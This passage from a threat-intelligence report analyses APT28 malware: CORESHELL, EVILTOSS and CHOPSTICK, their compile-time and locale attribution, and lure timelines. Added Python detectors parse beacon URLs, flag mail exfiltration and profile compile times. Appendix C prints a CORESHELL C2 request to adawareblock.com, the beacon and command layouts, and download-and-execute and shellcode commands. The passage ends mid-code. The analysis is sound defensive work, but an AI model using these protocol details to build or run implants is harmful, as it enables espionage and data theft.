•	SOURFACE: This downloader is typically called Sofacy within the cyber security community. However, because we have observed the name “Sofacy” used to refer to APT28 malware generally (to include the SOURFACE dropper, EVILTOSS, CHOPSTICK, and the credential harvester OLDBAIT), we are using the name SOURFACE to precisely refer to a specific downloader. This downloader obtains a second-stage backdoor from a C2 server. CORESHELL is an updated version of SOURFACE.
•	EVILTOSS: This backdoor has been delivered through the SOURFACE downloader to gain system access for reconnaissance, monitoring, credential theft, and shellcode execution.
•	CHOPSTICK: This is a modular implant compiled from a software framework that provides tailored functionality and flexibility.







A number of the malware variants that we profile below, especially the CHOPSTICK family, demonstrate formal coding practices indicative of methodical, diligent programmers. The modularity of CHOPSTICK alone, with its flexible and lasting platform, demonstrates planning for long-term use and versatility. We have also noted that APT28 tailors implants to their target environments, configuring them to use local network resources such as email servers.

APT28 has attempted to obfuscate their code and implement counter-analysis techniques:

•	One of the latest samples of CORESHELL includes counter-reverse engineering tactics via unused machine instructions. This would hinder static analysis of CORESHELL behavior by creating a large amount of unnecessary noise in the disassembly.
•	A number of CORESHELL droppers also conduct runtime checks, attempting to determine if they are executing in an analysis environment, and if so, they do not trigger their payloads.
•	Many samples across the SOURFACE/CORESHELL, CHOPSTICK, and EVILTOSS malware families obfuscate strings that are decoded at runtime. Two of the malware families (SOURFACE/CORESHELL and EVILTOSS) use the same decryption sequence and similar algorithms for string encoding and decoding. These families encode their strings at compile time using a custom stream cipher. From a high level, these ciphers share a similar design across the malware families but differ slightly in the internal arithmetic operations.
•	APT28 has employed RSA encryption to protect files and stolen information moved from the victim’s network to the controller.

Figure 6: Typical deployment of SOURFACE ecosystem
Spearphishing Email -> Document with exploit -> Dropper malware -> SOURFACE downloader (obtains 2nd stage from C2 server) -> Deploys 2nd stage droppers -> 2nd stage implant

EVOLUTION OF SOURFACE ECOSYSTEM INDICATES SYSTEMATIC DEVELOPMENT

APT28 has made incremental and systematic changes to the SOURFACE downloader and its surrounding ecosystem since as early as 2007. These changes indicate a long-standing and dedicated development effort behind APT28. We have observed samples of the SOURFACE downloader compiled between 2007 and 2014. We call SOURFACE (samples are frequently named netids.dll) a first stage downloader because its primary job is to retrieve a second stage payload from a C2 server. Until 2013, the SOURFACE downloader used hard-coded IP addresses for C2 communications, whereas the later CORESHELL samples use domains.


WHAT IS A MALWARE ECOSYSTEM?
First, a malware family is a collection of malware in which each sample shares a significant
amount of code with all of the others. There are exceptions: for example, some files
contain public and standard code libraries that we do not take into consideration
when making a family determination.
A malware ecosystem is a group of malware families that work together to perform
the same objective. Perhaps the simplest and most typical ecosystem
is a dropper and a backdoor that are used together. They may not share the
same code structure, but they are related because one drops and installs
the other.
The ecosystem surrounding the SOURFACE downloader frequently
consists of a dropper, which installs SOURFACE. The SOURFACE
downloader then receives another dropper from its C2 server, and
this second dropper installs a second stage backdoor, which is
usually EVILTOSS.







In April 2013, based on compile time, the group began to make significant alterations to the SOURFACE downloader. They started by changing the compiled DLL name to “coreshell.dll” and making minor changes to the network communications, as seen in Figure 7. The hostname, volume serial number and OS version data are encoded in the new URL format. As seen in the table below, the SOURFACE/CORESHELL developers also made other modifications that changed the exported function name and file size over time.

Figure 7: Example of modified SOURFACE vs. CORESHELL communications

SOURFACE URL for a sample compiled April 2013:
http://[hostname]/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-05_01

CORESHELL URL for a sample compiled April 2013:
http://[hostname]/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ1MDUwMQ==
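As an added example (not code from the FireEye report), the following Python pulls the beacon fields out of the two URL shapes shown in Figure 7 so that matching requests can be flagged in proxy logs. The split of the SOURFACE query string into hostname, 8-hex-digit volume serial and OS version (major_minor) is an assumption inferred from the single URL above; the CORESHELL parameter is only base64-decoded, because the report does not document the layout of the decoded string; the host c2.invalid and the log lines are constructed.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Added example, not code from the FireEye report. The two paths come from the
# URLs in Figure 7; the field boundaries in the SOURFACE query (hostname, then
# an 8-hex-digit volume serial, then "-" and the OS version as major_minor)
# are an assumption inferred from that single sample.
SOURFACE_PATH = "/~book/cgi-bin/brvc.cgi"
CORESHELL_PATH = "/~xh/ch.cgi"
SOURFACE_QUERY = re.compile(
    r"^(?P<host>.+?)(?P<serial>[0-9a-fA-F]{8})-(?P<major>\d{2})_(?P<minor>\d{2})$")


def parse_sourface(url: str):
    """Fields from a SOURFACE-style beacon URL, or None if the URL is not one."""
    u = urlparse(url)
    if u.path != SOURFACE_PATH:
        return None
    m = SOURFACE_QUERY.match(u.query)
    if not m:
        return None
    # The serial is the 8 hex digits immediately before the final "-major_minor",
    # so the non-greedy host group stops at an unambiguous boundary.
    return {
        "family": "SOURFACE",
        "host": m.group("host"),
        "volume_serial": m.group("serial").lower(),
        "os_version": f"{int(m.group('major'))}.{int(m.group('minor'))}",
    }


def parse_coreshell(url: str):
    """Decode the base64 parameter of a CORESHELL-style beacon URL.

    The report states that hostname, volume serial and OS version are encoded
    in this parameter but does not document the decoded layout, so the decoded
    string is handed back as-is for the analyst.
    """
    u = urlparse(url)
    if u.path != CORESHELL_PATH or not u.query:
        return None
    try:
        raw = base64.b64decode(u.query, validate=True)
    except (binascii.Error, ValueError):
        return None
    return {"family": "CORESHELL", "decoded": raw.decode("latin-1")}


def scan_proxy_log(lines):
    """Return one record per log line whose URL matches either beacon shape."""
    hits = []
    for line in lines:
        for token in line.split():
            if not token.startswith(("http://", "https://")):
                continue
            rec = parse_sourface(token) or parse_coreshell(token)
            if rec:
                hits.append(rec)
    return hits


# Constructed proxy log lines; c2.invalid stands in for the [hostname] in Figure 7.
SAMPLE_LOG = [
    "2013-04-20T09:12:03Z 10.0.0.15 GET http://c2.invalid/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-05_01 200",
    "2013-04-20T09:12:09Z 10.0.0.15 GET http://intranet.example/index.html 200",
    "2013-04-21T11:40:51Z 10.0.0.22 GET http://c2.invalid/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ1MDUwMQ== 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```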



Table 4: Evolution of SOURFACE downloader over time

MD5                               Size (bytes)  Compile Date             Export Name  Notes
272f0fde35dbdfccbca1e33373b3570d  11264         2013-04-16 10:49:25 UTC  Init1        17
8b92fe86c5b7a9e34f433a6fbac8bc3a  14848         2013-08-06 07:53:03 UTC  Initialize   18
9eebfebe3987fec3c395594dc57a0c4c  12800         2013-08-14 10:48:59 UTC  Initialize   19
da2a657dc69d7320f2ffc87013f257ad  12800         2013-08-21 07:52:10 UTC  Initialize   Same as previous.
1259c4fe5efd9bf07fc4c78466f2dd09  12800         2013-10-03 09:21:10 UTC  Initialize   Same as previous.
3b0ecd011500f61237c205834db0e13a  43520         2014-02-13 16:29:36 UTC  Applicate    20
5882fda97fdf78b47081cc4105d44f7c  45056         2014-05-13 15:18:24 UTC  Applicate    21
791428601ad12b9230b9ace4f2138713  45056         2014-05-13 16:42:26 UTC  Applicate    Same as previous.
ead4ec18ebce6890d20757bb9f5285b1  45056         2014-07-25 15:44:04 UTC  Applicate    Same as previous.
48656a93f9ba39410763a2196aabc67f  112640        2014-07-30 11:13:24 UTC  Applicate    22
8c4fa713c5e2b009114adda758adc445  112640        2014-07-30 11:13:24 UTC  Applicate    Same as previous.

Notes to Table 4:
17 SOURFACE with minor changes to network communications (see Figure 7).
18 Basic anti-debug measures added (process listing, rand timing, IsDebuggerPresent).
19 Switches from loading a secondary DLL (netui.dll/WinIDS.dll) to uploading the contents of %temp%\chkdbg.log.
20 Statically links the msvcrt library.
21 Statically links the msvcrt library; the strings used to identify the imported libraries and functions are reversed prior to being used, then reversed back after use.
22 This version added assembly level obfuscation, which slows down analysis. This variant requires the OS to be at least Windows Vista.











Figure 8: NATO-themed decoy delivered with possible EVILTOSS predecessor from 2004




Variants of the SOURFACE second stage backdoor, EVILTOSS, share some code similarities with SOURFACE. However, it contains more capabilities, including the ability to provide access to the file system and registry, enumerate network resources, create processes, log keystrokes, access stored credentials, and execute shellcode. The backdoor encrypts data that it uploads with an RSA public key. Many of its variants we have seen are named netui.dll. EVILTOSS variants may use the Simple Mail Transfer Protocol (SMTP) to send stolen data in an attachment named “detaluri.dat”. The backdoor attaches this file to a preformatted email and sends it out through a victim’s mail server.

Interestingly, we found an antivirus report from 2004[23] detailing what appears to be an early variant of EVILTOSS. The backdoor was installed alongside the NATO-themed decoy document depicted in Figure 8. The backdoor sent data via SMTP to nato_smtp@mail[.]ru and received its tasking via POP from nato_pop@mail[.]ru. Although we have not conclusively attributed this sample to APT28, it does suggest the possibility that APT28 has been operating since as early as 2004.[24]

23 http://ae.norton.com/security_response/print_writeup.jsp?docid=2004-081915-1004-99
24 Although the malware family and interest in NATO make it likely that APT28 was involved, we cannot conclusively attribute this sample to APT28 based on these factors alone. We have no evidence that they controlled the C2 for this malware or were using EVILTOSS in 2004. APT28 could have possibly obtained this source code from another group of actors. Also, malware can be passed from group to group. The other malware that we associate with APT28 in this paper is more strongly attributed to the group using additional factors, some of which we mention in Appendix A.






MODULAR IMPLANTS INDICATE A FORMAL DEVELOPMENT ENVIRONMENT




During our research, we discovered that APT28 uses a backdoor developed using a modular framework. We call this backdoor CHOPSTICK, a somewhat ironic name that comes from our semi-random name generator. The modular design allows flexible options for compiling variants with different capabilities as needed, as well as deploying additional capabilities at runtime. This allows the developers to make targeted implants, including only the capabilities and protocols necessary for a specific environment. Such a modular framework suggests the group has had an organized development effort since as early as 2007. A formal development environment, in which code is versioned and well-organized, would almost certainly be required to track and define the various modules that can be included in the backdoor at compile time.

CHOPSTICK variants may move messages and information using at least three methods:

1.	Communications with a C2 server using HTTP. These protocols are covered in more detail in Appendix D.
2.	Email sent through a specified mail server. One CHOPSTICK v1 variant contained modules and functions for collecting keystroke logs, Microsoft Office documents, and PGP files. The monitoring for new files of interest is performed by a “Directory Observer” module. In one sample this information was intended to be sent via SMTP using a Georgian MIA mail server. It used one of four embedded sender email addresses (@mia.gov.ge) to send files via email to another email address on the same mail server. All information required for the email was hardcoded in the backdoor.
3.	Local copying to defeat closed networks. One variant of CHOPSTICK focuses on apparent air gap / closed network capabilities by routing messages between local directories, the registry and USB drives.
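As an added example that is not part of the report, the following Python applies two mail-hunting rules drawn from the EVILTOSS and CHOPSTICK mail exfiltration described above: a message carrying an attachment named detaluri.dat, and an internal-to-internal message that relays collected-file types with a tiny, template-like body. The internal domain example.test, the file-type list, the body-length threshold and the sample messages are constructed assumptions.

```python
import email
from email import policy
from email.message import EmailMessage

# Added example, not code from the FireEye report. Rule 1 comes from the
# EVILTOSS description (stolen data mailed as an attachment named
# "detaluri.dat" in a preformatted message through the victim's own mail
# server); rule 2 from the CHOPSTICK email method (collected files mailed from a
# hardcoded internal sender to another mailbox on the same internal server).
# INTERNAL_DOMAIN, COLLECTED_TYPES and MAX_TEMPLATE_BODY are assumptions.
INTERNAL_DOMAIN = "example.test"
EVILTOSS_ATTACHMENT = "detaluri.dat"
COLLECTED_TYPES = (".doc", ".docx", ".xls", ".xlsx", ".pgp", ".gpg", ".asc", ".log")
MAX_TEMPLATE_BODY = 64  # a hardcoded, preformatted body is short and never varies


def _addresses(msg: EmailMessage, header: str):
    """All addr-specs in a header, lower-cased; [] if the header is absent."""
    hdr = msg.get(header)
    return [a.addr_spec.lower() for a in hdr.addresses] if hdr is not None else []


def _attachment_names(msg: EmailMessage):
    return [p.get_filename().lower() for p in msg.iter_attachments() if p.get_filename()]


def _body_text(msg: EmailMessage) -> str:
    body = msg.get_body(preferencelist=("plain",))
    return body.get_content().strip() if body is not None else ""


def classify(raw: bytes):
    """Return the rule names a raw RFC 5322 message trips ([] means no finding)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    names = _attachment_names(msg)
    findings = []

    # Rule 1: the EVILTOSS attachment name, regardless of sender or recipient.
    if EVILTOSS_ATTACHMENT in names:
        findings.append("eviltoss_detaluri_dat")

    # Rule 2: internal -> internal relay of collected-file types with a tiny
    # templated body. Coarse on its own; it narrows what an analyst reviews.
    suffix = "@" + INTERNAL_DOMAIN
    senders = _addresses(msg, "From")
    rcpts = _addresses(msg, "To") + _addresses(msg, "Cc")
    internal_only = bool(senders) and bool(rcpts) and all(
        a.endswith(suffix) for a in senders + rcpts)
    if (internal_only and any(n.endswith(COLLECTED_TYPES) for n in names)
            and len(_body_text(msg)) <= MAX_TEMPLATE_BODY):
        findings.append("chopstick_internal_relay")
    return findings


def _build(sender: str, to: str, body: str, filename: str) -> bytes:
    """Build a constructed test message with one binary attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = to
    msg["Subject"] = "report"
    msg.set_content(body)
    msg.add_attachment(b"\x00" * 16, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


# Constructed messages (addresses, bodies and file names are made up).
SAMPLES = {
    "eviltoss": _build("user1@example.test", "relay@outside.invalid", "data", "detaluri.dat"),
    "chopstick": _build("svc1@example.test", "drop@example.test", "", "keylog.log"),
    "benign": _build("alice@example.test", "bob@example.test",
                     "Hi Bob, attached is the quarterly budget draft we discussed "
                     "this morning; comments welcome before Friday.", "budget.xlsx"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw))
```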







APT28 MALWARE INDICATES RUSSIAN SPEAKERS IN A RUSSIAN TIME ZONE




During our research into APT28’s malware, we noted two details consistent across malware samples. The first was that APT28 had consistently compiled Russian language settings into their malware. The second was that malware compile times from 2007 to 2014 corresponded to normal business hours in the UTC+4 time zone, which includes major Russian cities such as Moscow and St. Petersburg.

Use of Russian and English Language Settings in PE Resources

PE resources include language information that can be helpful if a developer wants to show user interface items in a specific language.25 Non-default language settings packaged with PE resources are dependent on the developer’s build environment. Each PE resource includes a “locale” identifier with a language ID “composed of a primary language identifier indicating the language and a sublanguage identifier indicating the country/region.”26

At the time of the writing of this paper, we had identified 103 malware samples that were both attributed to APT28 and contained PE resources. Table 5 shows the locale identifiers27 with associated language and country/region for these samples.




Table 5: Locale and language identifiers associated with APT28 malware

Locale ID            Primary language                                   Country/Region         Number of APT28 samples
0x0419               Russian (ru)                                       Russia (RU)            59
0x0409               English (en)                                       United States (US)     27
0x0000 or 0x0800     Neutral locale / System default locale language    Neutral                16
0x0809               English (en)                                       United Kingdom (GB)    1

25 Microsoft Developer Network – Multiple Language Resources http://msdn.microsoft.com/en-us/library/cc194810.aspx
26, 27 Microsoft Developer Network – Language Identifier Constants and Strings http://msdn.microsoft.com/en-us/library/dd318693.aspx




25 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?


The samples with Russian language settings were compiled between late 2007 and late 2013, as depicted in Figure 9. This consistency over a long timeframe suggests that the developers of APT28 malware were using a build environment with Russian language settings at least some of the time and made no effort to obscure this detail. Overall, the locale IDs suggest that APT28 developers can operate in both Russian and English.




Figure 9: Number of APT28 samples with Russian language settings by compile month (bar chart, x-axis 0 to 9 samples; chart not reproduced). Compile months with Russian-locale samples: December 2007; March, May and August 2008; February, May and September 2009; February, March, August, September, October, November and December 2010; April, June, September and December 2011; April, May, June, July, October and December 2012; January, July, August, October, November and December 2013.







  Compile Times Align with Working
  Hours in Moscow and St. Petersburg
   Of the 140 malware samples that we have
  attributed to APT28 so far, over 89% were
  compiled between 0400 and 1400 UTC time, as
  depicted in Figure 10. Over 96% were compiled
  between Monday and Friday. This parallels the
  working hours in UTC+0400 (that is, compile
  times begin about 8AM and end about 6PM in this
  time zone). This time zone includes major Russian
  cities such as Moscow and St. Petersburg.
Figure 10: Compile Times of APT28 malware in UTC Time (histogram of sample frequency, 0 to 20, by hour of day in UTC, 0 to 24, with the band corresponding to Moscow business hours marked; chart not reproduced)
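As an added illustration (not code from the report), the following Python script reads IMAGE_FILE_HEADER.TimeDateStamp from PE files and profiles compile hours and weekdays the way the paragraph above describes. The PE builder produces constructed, header-only test inputs with chosen timestamps (they are not APT28 samples) and the ten sample timestamps are made up; the 04:00 to 14:00 UTC window and the UTC+4 offset are the report's. Two caveats a practitioner should keep in mind: the timestamp is attacker-controlled and some toolchains zero or fix it, so it is one weak indicator among several; and Moscow was on UTC+4 year-round only from 2011 to late 2014 (with summer time before that), so the window is an approximation.

```python
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

UTC = timezone.utc


def build_minimal_pe(timestamp: int) -> bytes:
    """Constructed test input: DOS header, PE signature and COFF file header
    carrying the given TimeDateStamp. Not a loadable binary, only enough of
    the header layout for compile_timestamp() below."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> offset of "PE\0\0"
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 0, timestamp, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def compile_timestamp(pe: bytes) -> datetime:
    """Return IMAGE_FILE_HEADER.TimeDateStamp as an aware UTC datetime."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # 4-byte signature, then Machine (2) and NumberOfSections (2) precede the stamp
    stamp = struct.unpack_from("<I", pe, e_lfanew + 8)[0]
    return datetime.fromtimestamp(stamp, tz=UTC)


def to_local(t: datetime, utc_offset_hours: int) -> datetime:
    """Shift a UTC timestamp into a fixed-offset zone (UTC+4 for the report's argument)."""
    return t.astimezone(timezone(timedelta(hours=utc_offset_hours)))


def working_hours_profile(samples, start_utc=4, end_utc=14, utc_offset_hours=4) -> dict:
    """Fraction of samples compiled inside [start_utc, end_utc) UTC and on
    Monday to Friday, plus hour histograms in UTC and in the local zone."""
    stamps = [compile_timestamp(s) for s in samples]
    n = len(stamps)
    in_window = sum(start_utc <= t.hour < end_utc for t in stamps)
    weekday = sum(t.weekday() < 5 for t in stamps)
    return {
        "samples": n,
        "in_window_fraction": in_window / n,
        "weekday_fraction": weekday / n,
        "utc_hour_histogram": Counter(t.hour for t in stamps),
        "local_hour_histogram": Counter(to_local(t, utc_offset_hours).hour for t in stamps),
    }


# Constructed sample set (made-up compile times, not APT28 data): eight weekday
# stamps inside the window, one Saturday stamp and one late-afternoon outlier.
SAMPLE_COMPILE_TIMES = [
    datetime(2010, 9, 6, 6, 15, tzinfo=UTC),    # Monday
    datetime(2010, 9, 7, 9, 30, tzinfo=UTC),    # Tuesday
    datetime(2010, 9, 8, 11, 0, tzinfo=UTC),    # Wednesday
    datetime(2010, 9, 9, 13, 45, tzinfo=UTC),   # Thursday
    datetime(2010, 9, 10, 5, 10, tzinfo=UTC),   # Friday
    datetime(2010, 9, 11, 10, 0, tzinfo=UTC),   # Saturday (weekend)
    datetime(2010, 9, 13, 16, 30, tzinfo=UTC),  # Monday, after the window
    datetime(2010, 9, 14, 7, 0, tzinfo=UTC),    # Tuesday
    datetime(2010, 9, 15, 4, 0, tzinfo=UTC),    # Wednesday, window start
    datetime(2010, 9, 16, 12, 59, tzinfo=UTC),  # Thursday
]
SAMPLES = [build_minimal_pe(int(t.timestamp())) for t in SAMPLE_COMPILE_TIMES]

if __name__ == "__main__":
    profile = working_hours_profile(SAMPLES)
    print("samples:", profile["samples"])
    print("compiled 04:00-14:00 UTC: %.0f%%" % (100 * profile["in_window_fraction"]))
    print("compiled Mon-Fri: %.0f%%" % (100 * profile["weekday_fraction"]))
    for hour in sorted(profile["local_hour_histogram"]):
        print("UTC+4 %02d:00  %s" % (hour, "#" * profile["local_hour_histogram"][hour]))
```

On real samples, replace SAMPLES with the file contents of the binaries under study; the histogram printed in UTC+4 is the local-time view the report's Figure 10 argues from.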





CONCLUSION
We started researching APT28 based on activity we observed on our clients’ networks, similar to other targeted threat groups we have identified over time. We assess that APT28 is most likely sponsored by the Russian government. We summarize our key observations about APT28 in Figure 11 below.

APT28’s characteristics—their targeting, malware, language, and working hours—have led us to conclude that we are tracking a focused, long-standing espionage effort. Given the available data, we assess that APT28’s work is sponsored by the Russian government.



Figure 11: Summary of key observations about APT28

 MALWARE
 Evolves and Maintains Tools for Continued, Long-Term Use
 •	 Uses malware with flexible and lasting platforms
 •	 Constantly evolves malware samples for continued use
 •	 Malware is tailored to specific victims’ environments, and is designed to hamper reverse engineering efforts
 •	 Development in a formal code development environment
 Various Data Theft Techniques
 •	 Backdoors using HTTP protocol
 •	 Backdoors using victim mail server
 •	 Local copying to defeat closed/air gapped networks

 TARGETING
 Georgia and the Caucasus
 •	 Ministry of Internal Affairs
 •	 Ministry of Defense
 •	 Journalist writing on Caucasus issues
 •	 Kavkaz Center
 Eastern European Governments & Militaries
 •	 Polish Government
 •	 Hungarian Government
 •	 Ministry of Foreign Affairs in Eastern Europe
 •	 Baltic Host exercises
 Security-related Organizations
 •	 NATO
 •	 OSCE
 •	 Defense attaches
 •	 Defense events and exhibitions
 RUSSIAN ATTRIBUTES
 Russian Language Indicators
 •	 Consistent use of Russian language in malware over a period of six years
 •	 Lure to journalist writing on Caucasus issues suggests APT28 understands both Russian and English
 Malware Compile Times Correspond to Work Day in Moscow’s Time Zone
 •	 Consistent among APT28 samples with compile times from 2007 to 2014
 •	 The compile times align with the standard workday in the UTC + 4 time zone which includes major Russian cities such
    as Moscow and St. Petersburg







APPENDIX A:
DISTINGUISHING
THREAT GROUPS




We use the term “threat group” to refer to actors who work together to target and penetrate networks of interest. These individuals may share the same set of tasks, coordinate targets, and share tools and methodology. They work together to gain access to their targets and steal data.

The art of attributing disparate intrusion activities to the same threat group is not always simple. Different groups may use similar intrusion methodologies and common tools, particularly those that are widely available on the Internet, such as pwdump, HTran, or Gh0st RAT. There may be overlaps between groups caused by the sharing of malware or exploits they have authored, or even the sharing of personnel. Individual threat actors may move between groups either temporarily or permanently. A threat actor may also be a private citizen who is hired by multiple groups. Multiple groups, on occasion, compromise the same target within the same timeframe.

Distinguishing one threat group from another is possible with enough information, analytical experience, and tools to piece it all together. We can analyze multiple incidents and tell by the evidence left behind that a given incident was the result of one threat group and not another.

Threat actors leave behind various forensic details. They may send spear phishing emails from a specific IP address or email address. Their emails may contain certain patterns; files have specific names, MD5 hashes, timestamps, custom functions, and encryption algorithms. Their backdoors may have command and control IP addresses or domain names embedded. These are just a few examples of the myriad of forensic details that we consider when distinguishing one threat group from another.

At the most basic level, we say that two intrusion events are attributed to the same group when we have collected enough indicators to show beyond a reasonable doubt that the same actor or group of actors were involved. We track all of the indicators and significant linkages associated with identified threat groups in a proprietary database that comprises millions of nodes and linkages between them. In this way, we can always go back and answer “why” we associated cyber threat activity with a particular group.







APPENDIX B:
TIMELINE OF
APT28 LURES




YEAR   LURE TOPIC                                                                                                MALWARE
2010   Iran’s work with an international organization (internal document)                                        SOURFACE
2011   File named “military cooperation.doc”                                                                     SOURFACE, OLDBAIT
2011   Georgian language IT document for Ministry of Internal Affairs (internal document)                        SOURFACE
2011   “USB Disk Security is the best software to block threats that can damage your PC or compromise your personal information via USB storage.”   SOURFACE
2012   Food security in Africa (“Food and nutrition crisis reaches peak but good forecast for 2013”)             SOURFACE
2012   “IDF Soldier Killed and another injured in a Terror Attack”                                               SOURFACE
2012   “Echo Crisis Report” on Portugal’s forest fires                                                           SOURFACE
2012   “FBI to monitor Facebook, Twitter, Myspace”                                                               SOURFACE
2012   Georgia (US state, not the country of Georgia) murder case uncovers terror plot                           SOURFACE
2012   Military attaches in London (internal document)                                                           SOURFACE
2013   South Africa MFA document                                                                                 CHOPSTICK, CORESHELL
2013   John Shalikashvili (Georgian-Polish-American US General) Questionnaire                                    CORESHELL
2013   Asia Pacific Economic Cooperation Summit 2013 reporters (internal document)                               SOURFACE
2013   Defense Attaches in Turkey (internal document)                                                            CHOPSTICK, CORESHELL
2013   Turkish Cypriot news about Syria chemical weapons                                                         CHOPSTICK, CORESHELL
2013   Georgian language document about drivers’ licenses (internal document)                                    EVILTOSS
2013   Apparent Reason Magazine-related lure sent to a journalist                                                CORESHELL
2014   Mandarin language document, possibly related to a Chinese aviation group (non-public document)            CORESHELL
2014   Netherlands-Malaysia cessation of hostilities; related to Ukraine airline attack                          CORESHELL






APPENDIX C:
SOURFACE/CORESHELL




SOURFACE is a downloader that obtains a second stage backdoor from a C2 server. Over time the downloader has evolved and the newer versions, usually compiled with the DLL name ‘coreshell.dll’, are distinct enough from the older versions that we refer to it as SOURFACE/CORESHELL or simply CORESHELL. This appendix focuses on these newer versions.

CORESHELL uses two threads to communicate with its C2 server. The first thread sends beacons that contain the process listing of the compromised host. The second thread is responsible for downloading and executing stage two payloads. Messages are sent using HTTP POST requests whose bodies contain encrypted and Base64 encoded data. The encryption algorithm is a custom stream cipher using a six-byte key. Commands from the controller to the CORESHELL implant are encrypted using another stream cipher but this time using an eight-byte key. CORESHELL has used the same user agent string (“MSIE 8.0”) that SOURFACE previously used, but in more recent samples CORESHELL uses the default Internet Explorer user agent string obtained from the system. Figure 11 shows an example POST request.




                                Figure 11: Example CORESHELL POST request




                                POST /check/ HTTP/1.1
                                User-Agent: MSIE 8.0
                                Host: adawareblock.com
                                Content-Length: 58
                                Cache-Control: no-cache


                                zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY=








                             When Base64 decoded, the POST content looks like this:

                             00000000 cd 77 ae 62 af ac ab 69 b5 6b 91 dc ab 20 b9 65 .w.b...i.k... .e
                             00000010 de b2 ac 2d 96 35 82 fd f3 d5 82 1e c7 bd a8 ee ...-.5..........
                             00000020 9c ee 9a 30 ac e5 21 e4 a6 ...0..!..


The key used to encrypt the message is six bytes long and is appended to the end of the message. In this example the key would be: 30 ac e5 21 e4 a6. When the message is decrypted, the resulting plaintext is:

                             00000000 00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68 .rhdnzxdfmF6f5ah
                             00000010 34 78 67 30 34 30 33 30 35 30 31 1a 00 00 00 23 4xg04030501....#
                             00000020 00 00 00 ...


The following table contains a breakdown of each field of the C2 message.



 Table 6: Example CORESHELL beacon structure



 Offset	      Value                    Description

 00           00                       Command byte:
                                       0 - Command request
                                       1 - Process listing
 01           “rhdn”                   Unknown - Potentially a campaign identifier. Values seen so far: “rhze”, “rhdn” and “mtfs”.
 05           “zxdfmF6f5ah4xg”         Hostname of compromised system

 13           “0403”                   Unknown - Potentially a version number. This number is hardcoded within the implant.
 17           “05”                     OS Major version

 19           “01”                     OS Minor version
 1B           0x0000001a               Header length minus the command byte (LE DWORD)
 1F           0x00000023               Length of the entire message (LE DWORD)








Commands are sent from the C2 server to the CORESHELL backdoor in HTTP responses to the POST requests. The command is identified by the NULL terminated UNICODE string “OK” (O\x00K\x00\x00\x00). The command is Base64 encoded and immediately follows the “OK” string. Figure 12 shows a sample CORESHELL command:


                                Figure 12: Example CORESHELL controller response




                                HTTP/1.1 200 OK
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 58

                                O.K...AQAAAKqqAQEBAQEBAQEVzPMEUUIzQtND8kOSRLVEVUV0RRRGN0bX




                             The Base64 decoded string is:

                             00000000 01 00 00 00 AA AA 01 01 01 01 01 01 01 01 10 41 ........ .......A
                             00000010 70 41 10 42 33 42 D3 43 F2 43 92 44 B5 44 55 45 pA.B3B.C .C.D.DUE
                             00000020 74 45 14 46 37 46 D7 tE.F7F.


                             The following table contains a description of each field in the command message:


                               Table 7: CORESHELL C2 message structure



                               Offset	      Value                        Description

                               00           0x00000001                   Constant value, must be set to 1 (LE DWORD)

                               04           AA AA                        Unknown - not referenced
                               06           01 01 01 01 01 01 01 01      Encryption key (8 bytes)

                               0E           10 41 70 41 10 42 33...      Encrypted command






                             When the above command “10 41 70 41 10 42 33…” is decrypted using the key “01 01 01 01 01
                             01 01 01” the following command message is produced:


                             00000000 04 CC C2 04 00 42 42 42 42 43 43 43 43 44 44 44 .....BBBBCCCCDDD
                             00000010 44 45 45 45 45 46 46 46 46                      DEEEEFFFF


                             The implant supports the following four command identifiers from the controller as seen in Table 8. The
                             first byte of the command message specifies the command type and is immediately followed by the PE or
                             shellcode to be executed. In this example the command byte is 04 indicating the following bytes are
                             shellcode. If the command byte was 01, 02, or 03 the following bytes would be a DLL or EXE that would
                             be written to disk and executed.



 Table 8: CORESHELL commands



 Command ID           Description

 01                   Save command data as %LOCALAPPDATA%\svchost.exe and execute using CreateProcess.

 02                   Save command data as %LOCALAPPDATA%\conhost.dll and execute using “rundll32.exe \”%s\”,#1”.
 03                   Save command data as %LOCALAPPDATA%\conhost.dll and execute using LoadLibrary.

 04                   Command data is a shell code and is executed using CreateThread.
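As an added example (not code from the report), the Python below parses the CORESHELL framing described in this appendix: the six-byte key trailing the beacon, the decrypted beacon layout of Table 6 (where the hostname has no length prefix and must be sized from the two length DWORDs at the end), the “OK”-prefixed controller response of Table 7, and the command dispatch of Table 8. The input bytes are the ones printed in Figures 11 and 12 and in the hex dumps above. The report does not disclose either stream cipher, so decryption is out of scope and the parsers consume the plaintext as printed. One discrepancy worth knowing when reproducing this: the Base64 text in Figure 12 decodes to different bytes at offsets 0x0E to 0x12 than the hex dump printed under it (everything from offset 0x13 on agrees), so the example checks only the fields on which the two agree.

```python
import base64
import struct

# Bytes as printed in Appendix C of the report (beacon from Figure 11,
# controller response from Figure 12, decrypted command from the text).
BEACON_B64 = b"zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY="
BEACON_CIPHERTEXT = base64.b64decode(BEACON_B64)
BEACON_PLAINTEXT = bytes.fromhex(
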